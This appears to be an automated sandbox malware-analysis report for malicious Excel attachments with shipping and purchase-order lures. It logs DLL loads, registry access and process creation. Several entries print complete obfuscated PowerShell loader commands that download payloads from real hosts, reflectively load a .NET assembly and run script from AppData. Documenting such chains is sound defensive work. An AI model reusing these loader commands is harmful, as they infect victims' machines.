Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: credssp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vaultcli.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr	Initial sample: OLE zip file path = xl/calcChain.xml
Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr	Initial sample: OLE zip file path = docProps/thumbnail.wmf

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Static file information: File size 1136128 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.pdb source: powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.pdbhP source: powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp

Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"	Jump to behavior
